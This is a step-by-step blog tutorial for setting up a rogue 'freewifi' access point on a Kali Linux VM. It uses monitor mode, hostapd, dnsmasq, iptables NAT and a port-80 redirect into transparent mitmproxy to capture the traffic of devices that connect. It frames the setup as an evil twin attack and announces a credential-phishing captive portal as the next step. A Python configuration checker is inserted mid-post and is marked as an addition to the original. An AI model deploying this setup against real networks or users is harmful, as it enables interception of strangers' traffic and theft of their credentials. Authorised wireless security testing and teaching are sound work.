Create a rogue access point with a Linux VM

Use a Kali Linux VM to create a fake access point and intercept wifi traffic

André Eichhofer

Good morning! Today we want to use a Linux virtual machine to create a rogue access point. Such a fake access point could be used to capture potentially unencrypted wifi traffic or to perform an evil twin attack. For this setup we will use

  • a Kali Linux VM running on Mac OS,
  • an Alfa Network wifi adapter,
  • hostapd for the access point,
  • dnsmasq for DNS resolution and DHCP, and
  • mitmproxy for traffic interception.

Create a rogue access point with a Kali Linux VM

First, note the IP address and the gateway of the Kali VM. Normally, the Kali VM gets its internet connection over a virtual bridged adapter from the host system. Use route to check the gateway and the interface.

root@kali: route
Destination     Gateway         Genmask         Flags Metric Ref    Use Iface
default         192.168.0.1     0.0.0.0         UG    100    0        0 eth0      <- Virtual network adapter that provides internet access to the VM
172.17.0.0      0.0.0.0         255.255.0.0     U     0      0        0 docker0
192.168.0.0     0.0.0.0         255.255.255.0   U     100    0        0 eth0      <- Local Network

You need to assign a new network to the access point that is, of course, different from the network that provides internet access to the VM.

  • Example: network for internet access of the VM: 192.168.0.0
  • Example: network for the access point: 192.168.1.0

[Image: Alfa Network adapter used to create a rogue access point]

Configure wlan interface

After that, plug in the external wifi adapter and check it with iwconfig. When plugged in, the adapter starts in managed mode.

root@kali: iwconfig
wlan0     IEEE 802.11  ESSID:off/any
          Mode:Managed  Access Point: Not-Associated   Tx-Power=30 dBm
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:off

Now, set the wifi adapter into monitor mode:

Kill NetworkManager (airmon-ng check kill also stops other processes that could interfere with the adapter):

  • airmon-ng check kill

Set the wifi adapter to monitor mode:

  • ifconfig wlan0 down
  • iwconfig wlan0 mode monitor
  • ifconfig wlan0 up

Alternatively, you can use

  • airmon-ng start wlan0

Check that the wlan0 interface is in monitor mode (airmon-ng may rename the interface, e.g. to wlan0mon; if it did, use that name in the commands and configuration files below):

  • iwconfig
  • ifconfig

Next, check which channels the wifi networks around you are using, and choose a channel that does not interfere with them. Normally, channel 1 or 11 interferes least with other APs. Use

  • airodump-ng wlan0

to list the channels of the other APs.

Configure hostapd

Now, configure hostapd to create the access point.

  • Create a directory (e.g. /documents/accesspoint) where you keep hostapd.conf and dnsmasq.conf.
  • Create hostapd.conf within that directory with the following configuration. Note that hostapd does not strip trailing comments from a line (everything after the = is taken as the value), so every comment goes on a line of its own:

# specify interface
interface=wlan0
driver=nl80211
# name of your network
ssid=freewifi
hw_mode=g
# normally channel 1 / 11
channel=1
# disable mac address filtering
macaddr_acl=0
# broadcast ssid
ignore_broadcast_ssid=0
ieee80211n=1
# set this to 0 if the AP is unstable
wme_enabled=0
# ensure country code is correct
country_code=AT

# ++++ for WPA2 use this +++++++
auth_algs=1
wpa=2
# wpa2 passphrase
wpa_passphrase=password1234
wpa_key_mgmt=WPA-PSK
wpa_pairwise=CCMP
wpa_group_rekey=86400

# ++++ for an open network use this instead of the WPA2 block ++++++++
# (hostapd applies the last wpa= line it reads, so keep only one of them active)
#wpa=0

Configure dnsmasq

Finally, you also need to configure the DNS and DHCP server that assigns IP addresses to connected devices. Create dnsmasq.conf within your directory with the following configuration:

# specify interface
interface=wlan0
# address pool handed out to clients (required: without a dhcp-range dnsmasq serves no DHCP leases)
dhcp-range=192.168.1.10,192.168.1.100,12h
# default gateway handed to clients
dhcp-option=3,192.168.1.1
# DNS server handed to clients
dhcp-option=6,192.168.1.1
# use Google nameserver for upstream resolution
server=8.8.8.8
log-queries
log-dhcp
listen-address=127.0.0.1
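
Before starting the daemons it is worth checking both files for the mistakes that bite here: hostapd takes everything after the = as the value (so a trailing comment corrupts the interface name or SSID), a repeated wpa= key silently leaves the last one in force, and dnsmasq offers no leases without a dhcp-range. The following checker is an added illustration, not code from the post or from either project; it reads each file the way its daemon does, and the sample configurations embedded in it are constructed for the script.

```python
# Added checker for the hostapd.conf and dnsmasq.conf shown above, not part of the original post.
# hostapd keeps everything after '=' as the value, so an inline '# comment' corrupts it;
# dnsmasq strips '#' comments but offers no leases without a dhcp-range. Samples are constructed.
HOSTAPD_SAMPLE = """\
interface=wlan0    # specify interface
ssid=freewifi
wpa=2
wpa_passphrase=password1234
wpa=0
"""
DNSMASQ_SAMPLE = """\
interface=wlan0    # specify interface
dhcp-option=3,192.168.1.1
dhcp-option=6,192.168.1.1
"""

def parse_kv(text, inline_comments):
    """Read key=value lines the way each daemon does; only dnsmasq honours inline '#'."""
    pairs = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip() if inline_comments else raw.strip()
        if not line or line.startswith("#"):
            continue
        key, _, value = line.partition("=")
        pairs.append((key.strip(), value))
    return pairs

def check_hostapd(text):
    pairs = parse_kv(text, inline_comments=False)
    last = dict(pairs)  # hostapd applies the last occurrence of a repeated key
    problems = [f"{k}: inline comment becomes part of the value {v!r}" for k, v in pairs if "#" in v]
    if [k for k, _ in pairs].count("wpa") > 1:
        problems.append(f"wpa: set more than once, effective value is {last['wpa']!r}")
    if last.get("wpa") == "2" and not 8 <= len(last.get("wpa_passphrase", "")) <= 63:
        problems.append("wpa_passphrase: WPA2-PSK needs 8-63 characters")
    return problems

def check_dnsmasq(text):
    conf = {}
    for key, value in parse_kv(text, inline_comments=True):
        conf.setdefault(key, []).append(value)
    if "dhcp-range" not in conf:
        return ["dhcp-range: missing, so dnsmasq offers no DHCP leases to clients"]
    prefix = conf["dhcp-range"][0].split(",")[0].rsplit(".", 1)[0]  # assumes a /24 pool
    problems = []
    for opt in conf.get("dhcp-option", []):
        code, _, addr = opt.partition(",")
        if code in ("3", "6") and not addr.startswith(prefix + "."):
            problems.append(f"dhcp-option {code}: {addr} is outside the lease pool {prefix}.0/24")
    return problems
```

Run check_hostapd and check_dnsmasq on the contents of your own files; an empty list means the checks passed.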

Configure network of the access point

Set up the network of the access point:

  • ifconfig wlan0 up 192.168.1.1 netmask 255.255.255.0
  • route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1

Enable internet access for the access point: devices that connect to it will reach the internet through the existing gateway on eth0. Enable NAT and IP forwarding with the following commands:

  • iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
  • iptables -A FORWARD -i eth0 -o wlan0 -m state --state RELATED,ESTABLISHED -j ACCEPT
  • iptables -A FORWARD -i wlan0 -o eth0 -j ACCEPT
  • echo 1 > /proc/sys/net/ipv4/ip_forward

Start the services: navigate to the directory with the configuration files and start both services

  • hostapd hostapd.conf
  • dnsmasq -C dnsmasq.conf -d

-> In the logs of hostapd and dnsmasq you will see the connecting devices and their DNS lookups.

Route traffic through a proxy server

Finally, once the access point is working, you can route the traffic of the connected devices through a proxy server to intercept unencrypted traffic.

To capture unencrypted traffic, redirect port 80 to mitmproxy and run it in transparent mode (a plain proxy mode cannot handle the redirected connections, since they carry no proxy-style request line):

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
mitmproxy --mode transparent --ssl-insecure

Note: you will only see unencrypted traffic in mitmproxy. Encrypted traffic is ignored unless the mitmproxy certificate is installed on the device the traffic comes from.

In the next post we will see how to create a fake captive portal to phish user credentials.